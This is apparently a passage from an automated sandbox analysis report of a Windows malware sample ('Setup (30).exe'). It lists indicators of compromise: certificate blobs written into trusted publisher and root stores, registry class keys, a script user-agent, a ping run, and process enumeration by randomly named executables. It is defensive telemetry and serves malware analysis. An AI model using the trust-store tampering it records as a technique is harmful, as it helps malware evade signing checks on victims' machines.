\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be GameBoxWin64.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC GameBoxWin64.exe Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA GameBoxWin64.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3368 PING.EXE -
Script User-Agent 9 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 249 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 83 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 126 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 235 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 242 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 81 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 131 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 133 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 254 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4128 Setup (30).exe 4128 Setup (30).exe 1832 yaA9xsNGEIw3vDLIIaEbBWpe.exe 1832 yaA9xsNGEIw3vDLIIaEbBWpe.exe 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3280 WerFault.exe 3280 WerFault.exe 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 4776 WerFault.exe 4776 WerFault.exe 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 4596 w32aqHUPTZAOK7mL1sdcXC3S.exe 3192 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3192 Process not Found -
Suspicious behavior: MapViewOfSection 40 IoCs
